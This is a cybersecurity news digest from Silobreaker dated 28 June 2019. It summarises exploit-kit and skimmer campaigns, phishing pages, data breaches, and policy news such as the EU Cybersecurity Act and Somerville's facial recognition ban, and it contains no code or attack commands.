Threat Reports

Silobreaker Daily Cyber Digest – 28 June 2019



Ongoing Campaigns

Spelevo exploit kit targets Flash and Internet Explorer vulnerabilities 

  • Researchers at Cisco Talos observed the Spelevo exploit kit being delivered via a compromised business-to-business site. The site was widely compromised and multiple pages, including the main homepage redirected to the gate used for the campaign.
  • Once a connection lines is established the infection process starts. The initial landing page runs a reconnaissance phase and then probes the operating system, web browser, and plugin information.  The attack searches for vulnerable versions of Flash to exploit CVE-2018-15982 or CVE-2018-8174 a use-after-free vulnerability in the VBScript engine of Internet Explorer.
  • Once the system has been compromised Spelevo drops the banking trojans IcedID and Dridex

Source (Includes IOCs)


Regin malware used in espionage attack on Yandex

  • According to Reuters, Yandex, often referred to as ‘Russia’s Google,’ was targeted in an espionage attack between October and November 2018. Sources told Reuters that the hackers appeared to have been looking for technical information on how Yandex authenticates user accounts.
  • A Kaspersky assessment concluded that ‘hackers likely tied to Western intelligence breached Yandex.’ The attack is said to have involved Regin Trojan, a hacking tool known to be used by the so-called ‘Five Eyes’ intelligence sharing alliance (US, UK, Australia, New Zealand and Canada).



New Instagram phishing scam lures victims with promise of ‘verified account’ status

  • Sucuri researchers came across the page Instagramforbusiness[.]info masquerading as a real Instagram verification submission page, which contains a link that redirects to a series of phishing forms where users are prompted to enter their Instagram credentials.



Highly customizable Inter skimmer observed stealing card details

  • Researchers at Fortinet observed a new campaign on April 19th, 2019, using a skimmer named ‘Inter’. They found a malicious JavaScript connecting to a site disguised as a visitor traffic tracker. The domain contained more than 11 open directories and over 70 skimmer scrips which were being updated as recently as June 20th, 2019.
  • The identified scripts can be categorized as loaders, web skimmers and fake payment forms. The loader scripts deliver the malware from one of the campaign’s C2s which load either the web skimmer or fake payment form. The loaded script is dependant on which payment service provider a website uses. Attackers customize scripts to inject forms specifically to the payment page of the compromised website.
  • The researchers emphasized the customizable features of the Inter skimmer which allows the group behind the campaign to target a wide range of websites and payment vendors. Additionally, they warned that Inter’s availability and ease of use mean that it can be used by ‘just about anyone’.

Source (Includes IOCs)


ShadowGate newly target global audience with updated GreenFlash Sundown exploit kit

  • Researchers at Trend Micro detected new activity from ShadowGate group in which an upgraded version of the GreenFlash Sundown exploit kit is used to deliver a Monero miner.
  • Victims are redirected to the exploit kit after visiting websites that contain malicious advertisements from compromised ad servers. The exploit kit then infects them with the cryptocurrency miner. 
  • According to the researchers, this activity also demonstrates the threat actor’s shift from targeting East Asia to targeting global victims. 

Source (Includes IOCs)


Researchers detect ‘fake jquery’ campaign leading to malvertising and ad fraud schemes 

  • Malwarebytes Labs researchers detected new domains used by an old malware campaign known as ‘fake jquery’. The campaign involves thousands of sites, mainly running outdated content management systems, injected with the jquery lookalike. The malicious JavaScript initially appears blank but the researchers found that the script redirects to malicious domains.
  • Users are redirected to different sites depending on their location and the device they are using. The campaign is heavily geared towards targeting mobile users and redirects them to sites that download apps containing trojans that display full screen ads. According to the researchers, the ultimate goal is to monetize these fullscreen adverts.

Source (Includes IOCs)


Java-based ATM malware uses victim bank’s ATM software to cash out ATMs

  • Kaspersky researchers discovered the ATM malware, named ATMJaDi, in spring 2019. The malware was uploaded to a multiscanner service from Mexico and later from Colombia. The malware is highly targeted and only works on a small set of ATMs. This is due to the attack using the victim bank’s ATM software Java proprietary class rather than standard XFS, JXFS or CSC libraries.
  • The malware runs on self-crafted HTTP server web interfaces and cannot be controlled via an ATM machine’s physical interface. Consequently, researchers believe that attackers have also compromised their target bank’s infrastructure to gain access to networks controlling the ATMs.

Source (Includes IOCs)


Azure App Service used to host an Amazon-themed phishing page

  • Netskope researchers detected an Amazon-themed phishing page hosted on the Azure App Service. The phishing page has been active since the first week of June.
  • The phishing page informed victims that their Amazon account was suspended and requested Amazon credentials and personal details such as credit card information, Social Security numbers, driver’s license information, email address and password, or mother’s maiden name. 

Source (Includes IOCs)


Leaks and Breaches

PCM Inc data breach gave hackers access to clients’ email and file sharing systems

  • Security researcher Brian Krebs learned that the cloud solution provider PCM Inc discovered the intrusion in mid-May 2019. A source told Krebs that attackers stole Office 365 administrative credentials that PCM managed client accounts with.
  • A security expert working for a PCM Inc customer said that the attackers seemed interested in stealing information to carry out gift card fraud.
  • PCM Inc declined to comment on the attack and instead released a statement claiming that there was ‘minimal-to-no impact to PCM customers’.



AIA fined SG$10,000 for data breach

  • The Singapore-based insurance company AIA has been fined SG$10,000 (£5,829) by the Personal Data Protection Commission for sending letters meant for 245 individuals to two of its customers between December 28th, 2017 and January 2nd, 2019. The letters contained personal information including policy numbers, premium accounts, full names and due dates of the recipients.
  • The company also suffered a second data breach in March 2019, exposing personal information of over 200 former and current agents.



Data management company Attunity exposed client data in cloud storage

  • UpGuard researchers discovered three publicly accessible Amazon S3 buckets related to Israeli-based data management company Attunity on May 13th, 2019. They have since been secured.
  • Exposed data includes sensitive information belonging to its clients. This includes  full names, employment details, and possibly Social Security numbers. The leak also exposed system credentials and system information, which could have led to further compromise. Attunity’s clients include over two thousand enterprises and half of Fortune 100 companies.



Key Biscayne, Florida, targeted in cyberattack

  • The village confirmed on June 27th, 2019 that it was affected by a ‘data security event’.  The attack took place on June 23rd, 2019 and forced the village to shut down some computer operations. 



MedicareSupplement[.]com exposes 5 million personal records via public database

  • Comparitech researchers and security researcher Bob Diachenko collaborated to uncover the publicly available MongoDB instance. The database appears to be part of MedicareSupplement[.]com’s marketing leads and was first indexed on May 10th, 2019.
  • The database contained personal details such as names, addresses, IP addresses, email addresses, marketing related information, and more. Additionally, about 239,000 records also ‘indicated insurance interest area’, such as cancer, life, auto, medical and supplemental insurance.
  • It is unknown if the database was accessed by unauthorized parties. Following correspondence with the researchers, MedicareSupplement[.]com disabled the database.




General News

Authorities call for vigilance following cyberattacks on Romanian medical institutions

  • Romanian authorities have called for vigilance by doctors and hospital administrators following a series of ransomware attacks on Romanian medical institutions. A total of nine Romanian hospitals have been hit by ransomware attacks within a week.
  • According to Bitdefender experts, the Maoloa ransomware and Phobos ransomware were used in the attacks. The attacks are believed to originate from China.



NCSC publishes joint report on publicly available hacking tools

  • UK’s National Cyber Security Centre (NCSC) published a joint report detailing the use of five hacking tools for malicious purposes. The research was conducted by cyber security authorities of Australia, Canada, New Zealand, the UK and US.
  • The report looks at the remote access trojan JBiFrost, the web shell China Chopper, credential stealer Mimikatz, lateral movement framework PowerShell Empire, and the C2 obfuscation tool HTran.



ENISA given permanent cybersecurity mandate and stronger powers

  •  The EU CyberSecurity Act (CSA) came into effect on June 27th, 2019, giving the European Union Agency for Network and Information Security (ENISA) a permanent mandate and more resources to oversee a cybersecurity issues in the EU.
  • The CSA also rebrands ENISA as the European Agency for Cybersecurity, granting the organization a new cybersecurity certification framework to help member states coordinate cyber security issues at the Union level.



MoD perform searches on police national fingerprint database

  • The UK’s biometrics commissioner Paul Wiles expressed his concern over searches performed by the Ministry of Defence (MoD) on the police national fingerprint database. Wiles stated that the searches did not have a ‘clearly defined lawful basis’.
  • The MoD used the database to check if fingerprints taken in military operations abroad matched person know to UK police or immigration authorities.



Somerville, Massachusetts, bans facial recognition in public places

  • The Somerville City Council passed the ‘Face Surveillance Full Ban Ordinance’ on June 27th, 2019, which prohibited any ‘department, agency, bureau, and/or subordinate division of the City of Somerville’ from using facial recognition software.
  • Somerville becomes the second US city after San Francisco to ban the use of facial recognition software.



Germany and the Netherlands agree to build first-ever joint military internet

  • On June 26th, 2019, German and Dutch Defence Ministers signed an agreement to build a joint military internet, to be known as the Tactical Edge Networking (TEN), which will merge parts of both countries’ military networks. If proven successful, other NATO members’ military networks will be unified in the future.
  • The aim of a joint military internet is to develop and deploy new and improved joint standards across NATO states, allowing for better future cooperation.



Former Equifax executive sentenced for insider trading

  • Jun Ying, former chief information officer of Equifax, was sentenced to a four-month prison sentence for insider trading on June 27th, 2019. Ying was found guilty of selling over $950 000 worth of Equifax stocks one and a half weeks prior to the company’s public data breach announcement. The Equifax data breach took place between May and July 2017 and exposed the personal data of over 145 million people.
  • This is the second case of an Equifax employee being convicted for insider trading relating to the same data breach.




The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

More News

  • Threat Summary: 11 – 17 October 2019

    11 – 17 October 2019 Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created...
  • Silobreaker Daily Cyber Digest – 17 October 2019

      Malware Graboid cryptojacking worm spreads between unsecured Docker hosts Researchers at Unit 42 identified a new cryptojacking worm, dubbed Graboid, that has infected...
  • Silobreaker Daily Cyber Digest – 16 October 2019

      Malware  Researchers publish analysis of LOWKEY malware FireEye researchers analysed LOWKEY malware, a backdoor that has been observed being used in highly targeted...
View all News

Request a demo

Get in touch